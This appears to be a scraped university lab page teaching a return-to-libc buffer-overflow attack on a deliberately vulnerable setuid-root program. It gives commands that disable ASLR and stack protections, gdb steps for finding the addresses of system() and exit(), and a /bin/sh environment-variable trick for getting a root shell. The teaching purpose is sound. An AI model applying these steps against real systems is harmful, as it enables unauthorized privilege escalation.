Return to libc

Return to libc

Overview

1
2
3
4
seed@instructor:~$ gcc -m32 -z execstack -o shellcode shellcode.c
seed@instructor:~$ ./shellcode
seed@instructor:~$ gcc -m32 -o shellcode shellcode.c
seed@instructor:~$ ./shellcode
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
## Attack design


- Good countermeasure, but not enough.
- If the stack is not executable, an alternative solution is to make 
the program jump to where there are executable codes.
- Enter the region for standard C library on Linux, called `libc`.









<figure
  
>
  <picture>
    <!-- Auto scaling with imagemagick -->
    <!--
      See https://www.debugbear.com/blog/responsive-images#w-descriptors-and-the-sizes-attribute and
      https://developer.mozilla.org/en-US/docs/Learn/HTML/Multimedia_and_embedding/Responsive_images for info on defining 'sizes' for responsive images
    -->
    
      
        <source
          class="responsive-img-srcset"
          
            srcset="/assets/img/courses/csc302/libc/libc_design-480.webp 480w,/assets/img/courses/csc302/libc/libc_design-800.webp 800w,/assets/img/courses/csc302/libc/libc_design-1400.webp 1400w,"
            type="image/webp"
          
          
            sizes="95vw"
          
        >
      
    
    <img
      src="/assets/img/courses/csc302/libc/libc_design.png"
      
      
        width="50%"
      
      
        height="auto"
      
      
      
        alt="Overview of libc attack"
      
      
      
        data-zoomable
      
      
        loading="lazy"
      
      onerror="this.onerror=null; $('.responsive-img-srcset').remove();"
    >
  </picture>

  
</figure>




- Create a file named `stack.c`

<script src="https://gist.github.com/linhbngo/a583a6912f26fb77b67c835933f76dce.js?file=stack_libc.c"></script>

- Compile stack with specific flags

```bash
gcc -m32 -fno-stack-protector -z noexecstack -o stack stack.c
sudo sysctl -w kernel.randomize_va_space=0
sudo chown root stack
sudo chmod 4755 stack
1
gdb stack
1
2
3
4
(gdb-peda)$ run
(gdb-peda)$ p system
(gdb-peda)$ p exit
(gdb-peda)$ quit
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31

- We want `system()` to execute `/bin/sh`.
- Therefore, `/bin/sh` must be in memory, and 
its address should be passed to `system()` as an argument.
- We cannot embed this in the source code (no access to source 
code of vulnerable program).
- Solution:
  - Utilize environment variables




- Create a file named `find_myshell.c`

<script src="https://gist.github.com/linhbngo/a583a6912f26fb77b67c835933f76dce.js?file=find_myshell.c"></script>

- Create the EV, then compile and run find_myshell.c

```bash
export MYSHELL="/bin/sh"
gcc -m32 -o myshell find_myshell.c
./myshell
gcc -m32 -o myshell0 find_myshell.c
./myshell0
gcc -m32 -o myshell1 find_myshell.c
./myshell1
gcc -m32 -o myshell22 find_myshell.c
./myshell22
gcc -m32 -o myshell222 find_myshell.c
./myshell222
Function prologue 1
1
2
3
pushl %ebp
movl %esp, %ebp
subl $N, %esp
Function prologue 2
1
2
3
movl %ebp, %esp
popl %ebp
ret
Function epilogue
How changes are made
1
2
3
4
5
6
7
8
9
## Attack


- Compile `gdb_stack` 

```bash
gcc -m32 -fno-stack-protector -z noexecstack -g -o gdb_stack stack.c
gdb gdb_stack
1
2
3
4
5
6
7
gdb-peda$ break vul_func
gdb-peda$ run
gdb-peda$ n
gdb-peda$ p $ebp
gdb-peda$ p &buffer
gdb-peda$ p hex_value_from_ebp - hex_value_from_buffer
gdb-peda$ quit
Distance and offsets
1
2
gcc -o kcats find_myshell.c
./kcats
1
gcc -m32 -o exploit ret_to_libc_exploit.c; ./exploit; ./stack

```